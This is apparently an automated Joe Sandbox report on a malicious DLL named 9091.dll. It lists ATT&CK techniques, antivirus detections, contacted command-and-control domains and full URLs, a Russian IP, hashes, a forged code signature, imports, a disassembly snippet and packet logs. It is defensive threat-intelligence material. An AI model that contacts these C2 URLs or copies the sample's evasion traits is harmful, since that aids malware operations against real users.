Bracketed figures are the report's per-technique signature-count badges; cells without one are the unmatched techniques of the standard matrix.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation [2] | DLL Side-Loading [1] | Process Injection [1][1][2] | Virtualization/Sandbox Evasion [1][1] | OS Credential Dumping | System Time Discovery [1] | Remote Services | Archive Collected Data [1] | Exfiltration Over Other Network Medium | Encrypted Channel [1][1] | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API [1][2] | Boot or Logon Initialization Scripts | DLL Side-Loading [1] | Process Injection [1][1][2] | LSASS Memory | Security Software Discovery [1] | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer [4] | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information [1] | Security Account Manager | Virtualization/Sandbox Evasion [1][1] | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol [3] | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Regsvr32 [1] | NTDS | Process Discovery [2] | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol [1][4] | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Rundll32 [1] | LSA Secrets | Account Discovery [1] | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing [1] | Cached Domain Credentials | System Owner/User Discovery [1] | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading [1] | DCSync | Remote System Discovery [1] | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery [1][1][3] | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

Behavior Graph

Screenshots

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      9091.dll23%VirustotalBrowse
                      9091.dll8%MetadefenderBrowse
                      9091.dll30%ReversingLabsWin32.Trojan.Sleltasos
                      9091.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label
0.1.loaddll32.exe.10000000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
5.2.rundll32.exe.4280000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
3.1.regsvr32.exe.10000000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
3.2.regsvr32.exe.10000000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
5.2.rundll32.exe.10000000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
4.2.rundll32.exe.10000000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
3.2.regsvr32.exe.2bd0000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
4.2.rundll32.exe.4a40000.2.unpack | 100% | Avira | HEUR/AGEN.1108168
4.1.rundll32.exe.10000000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.loaddll32.exe.10000000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
0.2.loaddll32.exe.d40000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
5.1.rundll32.exe.10000000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                      Domains

Source | Detection | Scanner | Label
firsone1.online | 0% | Virustotal |

                      URLs

Source | Detection | Scanner | Label
https://kdsjdsadas.online/jkloll/n1yCX1bWO/IyJVfm7yH8jH38Bki7vn/f4C45hYEgppc8I7zVra/TaacUzdsuPU7_2Bk | 0% | Avira URL Cloud | safe
https://firsone1.online/jkloll/hyS7uNj0vVvG2CRrLbZZ4/bEGaiUTSXLmYtAhM/9KrJzj3TRaRiQeM/Wjbl2GC0W3yiu5 | 0% | Avira URL Cloud | safe
https://firsone1.online/jkloll/5uYUQ_2FQN86iHNY49L/DPZD3ITzlDFx_2FKNcjDOh/yQZWvL_2BsZuR/HjaAog4G/r_2B0Neng3bSSbmoFIlXYWw/KZfLo5Aq9a/AVLYw7N9qXQVRr8XS/UyotZ_2BKl95/LDReSgxNZCB/ot3ANBI_2Bmf2Z/wTO_2FRZveJAMYt1OAKW1/qd_2B_2BejnLQISw/xnKbO7DZ_2BFAtS/sbOL_2FiP79J/M.mki | 0% | Avira URL Cloud | safe
https://firsone1.online/jkloll/M6Ph7XVMuIVnQJ918dgP/iGy5ZNMffw4qd2BD6Nw/xbvKMlzJtC6XNowbd_2FKm/UnXnZNKrDT7Gw/3YWrqGQ_/2BiRpEYdm3L3qPwkGvjzy_2/FMNOIyI3KK/TIH3Ipp58a4osBqNi/vURpkVVskEDy/A_2BcLgra2r/_2BirjcwqYwgZh/tXOQJ7uW2wVdt9rR3elhH/xJqL8can/GFbQ.mki | 0% | Avira URL Cloud | safe
https://kdsjdsadas.online/ | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
firsone1.online | 134.0.117.195 | true | true | | unknown
google.mail.com | unknown | unknown | false | | high
kdsjdsadas.online | unknown | unknown | true | | unknown

                          Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://firsone1.online/jkloll/5uYUQ_2FQN86iHNY49L/DPZD3ITzlDFx_2FKNcjDOh/yQZWvL_2BsZuR/HjaAog4G/r_2B0Neng3bSSbmoFIlXYWw/KZfLo5Aq9a/AVLYw7N9qXQVRr8XS/UyotZ_2BKl95/LDReSgxNZCB/ot3ANBI_2Bmf2Z/wTO_2FRZveJAMYt1OAKW1/qd_2B_2BejnLQISw/xnKbO7DZ_2BFAtS/sbOL_2FiP79J/M.mki | true | Avira URL Cloud: safe | unknown
https://firsone1.online/jkloll/M6Ph7XVMuIVnQJ918dgP/iGy5ZNMffw4qd2BD6Nw/xbvKMlzJtC6XNowbd_2FKm/UnXnZNKrDT7Gw/3YWrqGQ_/2BiRpEYdm3L3qPwkGvjzy_2/FMNOIyI3KK/TIH3Ipp58a4osBqNi/vURpkVVskEDy/A_2BcLgra2r/_2BirjcwqYwgZh/tXOQJ7uW2wVdt9rR3elhH/xJqL8can/GFbQ.mki | true | Avira URL Cloud: safe | unknown

                          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://google.mail.com/jkloll/SrOhqn0MT2IAkG_2B4u/QUT97q1sQV0r5x6X8tk4tl/QK7oXiqO2sMkr/Uet1eMX4/DBd | loaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmp | false | | high
http://www.symantec.com | 9091.dll | false | | high
https://kdsjdsadas.online/jkloll/n1yCX1bWO/IyJVfm7yH8jH38Bki7vn/f4C45hYEgppc8I7zVra/TaacUzdsuPU7_2Bk | loaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://firsone1.online/jkloll/hyS7uNj0vVvG2CRrLbZZ4/bEGaiUTSXLmYtAhM/9KrJzj3TRaRiQeM/Wjbl2GC0W3yiu5 | loaddll32.exe, 00000000.00000003.484055973.0000000000ADA000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://kdsjdsadas.online/ | loaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown

                              Contacted IPs

                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
134.0.117.195 | firsone1.online | Russian Federation | 197695 | AS-REGRU | true

                              General Information

                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:548724
                              Start date:06.01.2022
                              Start time:11:50:07
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 9m 41s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:9091.dll
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:30
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.evad.winDLL@9/0@16/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 66.1% (good quality ratio 62.8%)
                              • Quality average: 80%
                              • Quality standard deviation: 28.6%
                              HCA Information:
                              • Successful, ratio: 63%
                              • Number of executed functions: 123
                              • Number of non-executed functions: 117
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .dll
                              • Override analysis time to 240s for rundll32
                              Warnings:
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                              • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.35.236.56
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, prod.fs.microsoft.com.akadns.net
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

Time | Type | Description
11:50:58 | API Interceptor | 1x Sleep call for process: regsvr32.exe modified
11:50:58 | API Interceptor | 2x Sleep call for process: rundll32.exe modified
11:51:00 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASN

Match | Associated Sample Name / URL | Detection | Context
AS-REGRU | 3A6CA6A75525505890DC5D13AB3D888135B1CB4922605.exe | malicious | 91.224.22.193
| 00B5C410D204D6A92F6636E23998777D2716E8928F96B.exe | malicious | 91.224.22.193
| ACAs6Kprey.exe | malicious | 91.224.22.193
| VmIzagkjCN.exe | malicious | 91.224.22.193
| 3AXhCF0wwC.exe | malicious | 91.224.22.193
| VjZ2RqGBHw.exe | malicious | 194.87.185.135
| Hc4KII1iA8.exe | malicious | 194.87.185.125
| 02074f3606117bb4d18da7796c4866a746ed3eaeb2ffa.exe | malicious | 194.87.185.125
| 5508b2b109b759359ba8fb16563b3eab549c1a2e39984.exe | malicious | 194.87.185.125
| vWSlt1VcxW.exe | malicious | 194.87.185.125
| vI2FA978aV.exe | malicious | 194.87.185.125
| HpFJGpPUfD.exe | malicious | 194.87.185.125
| 45HwRuIsfe.exe | malicious | 194.87.185.125
| G4aYlYk5Vp.exe | malicious | 194.87.185.135
| 7WQadnF0l1.exe | malicious | 91.224.22.193
| 28043B9D96A6D54044950BCA23633AB601DCFDBE4305B.exe | malicious | 91.224.22.193
| nUkbOfIFrC.exe | malicious | 91.224.22.193
| WhCaRe7XsR.exe | malicious | 91.224.22.193
| eiqhremk1t.exe | malicious | 91.224.22.193
| 8TDgYQyI5F.exe | malicious | 91.224.22.193

                              JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
37f463bf4616ecd445d4a1937da06e19 | content-1.dotm | malicious | 134.0.117.195
| cC1Ah2Rb6v.exe | malicious | 134.0.117.195
| IcB2dEV7s3.exe | malicious | 134.0.117.195
| ZoUkhFNM2x.dll | malicious | 134.0.117.195
| z745hbus8A.dll | malicious | 134.0.117.195
| fW1PcUI2uF.dll | malicious | 134.0.117.195
| content-1.dotm | malicious | 134.0.117.195
| Verlyqyxssaxyfkseckzhdsdepwirsjjoa.exe | malicious | 134.0.117.195
| BACS betaling from Chr Pedersens Tegnestue.xlsx | malicious | 134.0.117.195
| 4BAEF09AFA940E86CDB9651C83BB40B87674E507E5C4E.exe | malicious | 134.0.117.195
| adguardinstaller.exe | malicious | 134.0.117.195
| 7zJwsSgHYP.exe | malicious | 134.0.117.195
| 0BFJSiSdej.exe | malicious | 134.0.117.195
| ABxSa33mul.exe | malicious | 134.0.117.195
| hK9HRT2Nc0.exe | malicious | 134.0.117.195
| ABxSa33mul.exe | malicious | 134.0.117.195
| YLgzPnCVZX.docx | malicious | 134.0.117.195
| Statment Payment Request.xlsx | malicious | 134.0.117.195
| RFQ FOR 2022 NEW ORDER.exe | malicious | 134.0.117.195
| Oxpxvknymqvpksgmqwnmrzbidwmldqvaaq.exe | malicious | 134.0.117.195

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:MS-DOS executable, MZ for MS-DOS
                              Entropy (8bit):6.176894617561241
                              TrID:
                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                              • Generic Win/DOS Executable (2004/3) 0.20%
                              • DOS Executable Generic (2002/1) 0.20%
                              • VXD Driver (31/22) 0.00%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:9091.dll
                              File size:814960
                              MD5:8cef4bb6ea32fc461e3a954500413512
                              SHA1:d0612a06f724ebdb72db009010207c929aac9007
                              SHA256:6a455667f74c818d5e20a83af8ba5eb8022b1714ceb9302c2b7f7f4ea1a141c9
                              SHA512:643bddbb9dfe6f1a3ffbb3966633139e16311c61d2ae3d4434410dea484b49520d6f6830e008d119e9da0dffc50d603aa022fc93f4ecfa2e4cbc7f3a31a88170
                              SSDEEP:12288:0ndQdX/AMsv/4xivLv3nt+pjL9xLd5pbafXcEgP5tVLYA:0nd+XTsX4xeLVkf9D/OfMpP5tVLr
                              File Content Preview:MZ......................................................................!..L.!This program cannot be run in :NS#mode....$.......PE..L...Y..a...........!.........$...&...................................................s...............................#..S..

                              File Icon

                              Icon Hash:74f0e4ecccdce0e4

                              Static PE Info

                              General

                              Entrypoint:0x1000d5a5
                              Entrypoint Section:.text
                              Digitally signed:true
                              Imagebase:0x10000000
                              Subsystem:windows gui
                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                              DLL Characteristics:
                              Time Stamp:0x6182C359 [Wed Nov 3 17:14:01 2021 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:75c5d658b9f8b84d2af03b825d82cf97

                              Authenticode Signature

                              Signature Valid:false
                              Signature Issuer:CN=VeriSign Class 3 Code Signing 2004 CA, OU=Terms of use at https://www.verisign.com/rpa (c)04, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                              Signature Validation Error:The digital signature of the object did not verify
                              Error Number:-2146869232
                              Not Before, Not After
                              • 10/30/2007 5:00:00 PM 11/24/2010 3:59:59 PM
                              Subject Chain
                              • CN=Symantec Corporation, OU=Symantec Research Labs, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=Symantec Corporation, L=Santa Monica, S=California, C=US
                              Version:3
                              Thumbprint MD5:773A103A1953B292916AAA8D3382140B
                              Thumbprint SHA-1:508E846523E1B131438B220694BE91793886508E
                              Thumbprint SHA-256:F67DDA8679C10547D47FBC3BD71D98953D4F73FC60C50035E6F366E3DA6395C2
                              Serial:758F5EE8263B6694719D8434EB998608

                              Entrypoint Preview

                              Instruction
                              sub edx, 00080614h
                              xor edx, edx
                              xor ecx, ecx
                              push ecx
                              call dword ptr [1001D1F4h]
                              or eax, eax
                              je 00007FAD2CC1A223h
                              ret
                              xor eax, eax
                              jmp 00007FAD2CC16247h
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              mov ecx, dword ptr [ebp+08h]
                              call 00007FAD2CC19472h
                              mov ecx, dword ptr [edx-04h]
                              add ecx, eax
                              ret
                              mov dword ptr [004222ACh], 00416B00h
                              jmp 00007FAD2CC0C48Ah
                              call 00007FAD2CC1A4A1h
                              pop ebx
                              lea ecx, dword ptr [ebp-00000430h]
                              mov ecx, dword ptr [edx-08h]
                              int3
                              int3
                              int3
                              int3
                              lea ecx, dword ptr [ebp-01h]
                              int3
                              lea ecx, dword ptr [ebp-2Ch]
                              dec dword ptr [ebp+10h]
                              call 00007FAD2CC19406h
                              mov dword ptr [00422A34h], eax
                              push 0000006Ah
                              push 00000001h
                              call dword ptr [1001D2A8h]
                              mov dword ptr [ebp+08h], eax
                              cmp eax, 00000000h
                              jne 00007FAD2CC0FA5Eh
                              push dword ptr [100DED98h]
                              push dword ptr [ebp+08h]
                              push dword ptr [100DEA55h]
                              push eax
                              push 100053D4h
                              ret
                              hlt
                              hlt
                              hlt
                              hlt
                              hlt
                              mov ecx, dword ptr [ebp-10h]
                              int3
                              int3
                              jmp 00007FAD2CC0C3ADh
                              mov dword ptr [ebp+08h], eax
                              cmp eax, 00000000h
                              jne 00007FAD2CC0F0F6h
                              push 00000021h
                              push dword ptr [100DDC72h]

                              Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x123b4 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1233c | 0x78 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe7000 | 0x264 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xc5a00 | 0x1570 | .data
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe8000 | 0x1874 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1d1b8 | 0x1b8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                              Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1206a | 0x12200 | False | 0.483876616379 | data | 6.17524441599 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.arthros | 0x14000 | 0x81e3 | 0x200 | False | 0.115234375 | data | 0.694481329226 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata | 0x1d000 | 0xb5a | 0xc00 | False | 0.430989583333 | data | 5.17974431027 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.preter | 0x1e000 | 0x3a908 | 0x32800 | False | 0.458684637995 | COM executable for DOS | 5.79983555937 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.witched | 0x59000 | 0x38fff | 0x31000 | False | 0.458665497449 | data | 5.79587852109 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.restitu | 0x92000 | 0x3243e | 0x32600 | False | 0.458339795285 | data | 5.7997141046 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.data | 0xc5000 | 0x21f94 | 0x19e00 | False | 0.609478789251 | data | 5.91710883704 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0xe7000 | 0x264 | 0x400 | False | 0.31640625 | data | 2.11462066039 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe8000 | 0x1874 | 0x1a00 | False | 0.778846153846 | data | 6.61132299142 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0xe7058 | 0x20c | data | English | United States

                              Imports

DLL | Imports
advapi32.dll | GetTokenInformation, SetSecurityDescriptorDacl, SetTokenInformation, RegDeleteValueW, InitializeSecurityDescriptor, RegOpenKeyExW, RevertToSelf, OpenProcessToken
kernel32.dll | SetConsoleCtrlHandler, DeleteCriticalSection, ReadFile, LockResource, GetTempPathW, CancelWaitableTimer, LoadLibraryA, RaiseException, QueryPerformanceCounter, OutputDebugStringW, EnterCriticalSection, SizeofResource, HeapFree, WaitForMultipleObjects, UnmapViewOfFile, LoadLibraryW, ResetEvent, WaitForSingleObject, GetLastError, SetWaitableTimer, VirtualProtect, OpenFileMappingW, CopyFileW, GetCurrentProcessId, GetProcessHeap, GetModuleFileNameW, CreateFileMappingW, HeapAlloc, FlushFileBuffers, CreateNamedPipeW, GetCommandLineW, DeleteFileW, FindFirstFileW, FindNextFileW, InitializeCriticalSectionAndSpinCount, DisconnectNamedPipe, MultiByteToWideChar, GetSystemInfo, CloseHandle, GetComputerNameExW, GetModuleFileNameA, InterlockedExchange, LeaveCriticalSection, FreeLibrary, GetTickCount, GetFileSize, FindResourceExW, ConnectNamedPipe, HeapSize, TerminateThread, CreateMutexW, DeviceIoControl, CreateThread, IsDebuggerPresent, GetOverlappedResult, ExpandEnvironmentStringsW, IsProcessorFeaturePresent, CancelIo, GetDateFormatW, HeapDestroy, GetModuleHandleW, FindClose, ReleaseMutex, WaitForMultipleObjectsEx, CreateEventW, FindResourceW, GetCurrentThreadId, WideCharToMultiByte, CreateFileW, GetCurrentProcess, MapViewOfFile, CreateWaitableTimerW, LoadResource, InitializeCriticalSection, GetTimeFormatW, SetEvent, GetTimeZoneInformation, Sleep, GetShortPathNameW, HeapReAlloc
mpr.dll | WNetGetUniversalNameW
ole32.dll | CoUninitialize, CoInitialize
user32.dll | EnumThreadWindows, SendMessageW, LoadStringW, MsgWaitForMultipleObjects, SetTimer, wsprintfW, PostThreadMessageW, GetParent, LoadIconA, DispatchMessageW, GetIconInfo, TranslateMessage, IsWindow, KillTimer

                              Exports

Name | Ordinal | Address
DllRegisterServer | 1 | 0x100072b9

                              Version Infos

Description | Data
InternalName | Bavius
FileVersion | 3, 2, 8, 9
CompanyName | PRomT
FileDescription | Suberitidae
Comments | Unannex
PrivateBuild | Philomel
Translation | 0x0409 0x04e4

                              Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              Jan 6, 2022 11:52:35.678787947 CET49812443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:35.688746929 CET49812443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:35.688785076 CET44349812134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.232381105 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.232429028 CET44349813134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.232552052 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.271809101 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.271845102 CET44349813134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.384601116 CET44349813134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.384757042 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.662944078 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.662972927 CET44349813134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.663539886 CET44349813134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.663598061 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.666419983 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.708877087 CET44349813134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.719192028 CET44349813134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.719260931 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.719290972 CET44349813134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.719338894 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.719352961 CET44349813134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.719398975 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.719773054 CET44349813134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.719827890 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.727421999 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.727447987 CET44349813134.0.117.195192.168.2.3

                              UDP Packets

                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Jan 6, 2022 11:51:11.877147913 CET | 56009 | 53 | 192.168.2.3 | 8.8.8.8
                              Jan 6, 2022 11:51:11.899928093 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.3
                              Jan 6, 2022 11:51:14.235074043 CET | 59026 | 53 | 192.168.2.3 | 8.8.8.8
                              Jan 6, 2022 11:51:14.255937099 CET | 53 | 59026 | 8.8.8.8 | 192.168.2.3
                              Jan 6, 2022 11:51:14.977771997 CET | 49572 | 53 | 192.168.2.3 | 8.8.8.8
                              Jan 6, 2022 11:51:15.000612974 CET | 53 | 49572 | 8.8.8.8 | 192.168.2.3
                              Jan 6, 2022 11:51:18.989257097 CET | 52130 | 53 | 192.168.2.3 | 8.8.8.8
                              Jan 6, 2022 11:51:19.008183002 CET | 53 | 52130 | 8.8.8.8 | 192.168.2.3
                              Jan 6, 2022 11:52:32.089071035 CET | 55108 | 53 | 192.168.2.3 | 8.8.8.8
                              Jan 6, 2022 11:52:32.159209967 CET | 53 | 55108 | 8.8.8.8 | 192.168.2.3
                              Jan 6, 2022 11:52:34.447751045 CET | 58942 | 53 | 192.168.2.3 | 8.8.8.8
                              Jan 6, 2022 11:52:34.516730070 CET | 53 | 58942 | 8.8.8.8 | 192.168.2.3
                              Jan 6, 2022 11:52:35.159759045 CET | 64432 | 53 | 192.168.2.3 | 8.8.8.8
                              Jan 6, 2022 11:52:35.227482080 CET | 53 | 64432 | 8.8.8.8 | 192.168.2.3
                              Jan 6, 2022 11:52:39.175417900 CET | 49250 | 53 | 192.168.2.3 | 8.8.8.8
                              Jan 6, 2022 11:52:39.194324017 CET | 53 | 49250 | 8.8.8.8 | 192.168.2.3
                              Jan 6, 2022 11:52:53.208827972 CET | 61120 | 53 | 192.168.2.3 | 8.8.8.8
                              Jan 6, 2022 11:52:53.233433962 CET | 53 | 61120 | 8.8.8.8 | 192.168.2.3
                              Jan 6, 2022 11:52:55.117465973 CET | 53079 | 53 | 192.168.2.3 | 8.8.8.8
                              Jan 6, 2022 11:52:55.136367083 CET | 53 | 53079 | 8.8.8.8 | 192.168.2.3
                              Jan 6, 2022 11:52:55.785442114 CET | 50824 | 53 | 192.168.2.3 | 8.8.8.8
                              Jan 6, 2022 11:52:55.804541111 CET | 53 | 50824 | 8.8.8.8 | 192.168.2.3
                              Jan 6, 2022 11:52:59.872992992 CET | 53569 | 53 | 192.168.2.3 | 8.8.8.8
                              Jan 6, 2022 11:52:59.894037962 CET | 53 | 53569 | 8.8.8.8 | 192.168.2.3
                              Jan 6, 2022 11:54:13.779227018 CET | 49290 | 53 | 192.168.2.3 | 8.8.8.8
                              Jan 6, 2022 11:54:13.795664072 CET | 53 | 49290 | 8.8.8.8 | 192.168.2.3
                              Jan 6, 2022 11:54:15.196199894 CET | 59754 | 53 | 192.168.2.3 | 8.8.8.8
                              Jan 6, 2022 11:54:15.220105886 CET | 53 | 59754 | 8.8.8.8 | 192.168.2.3
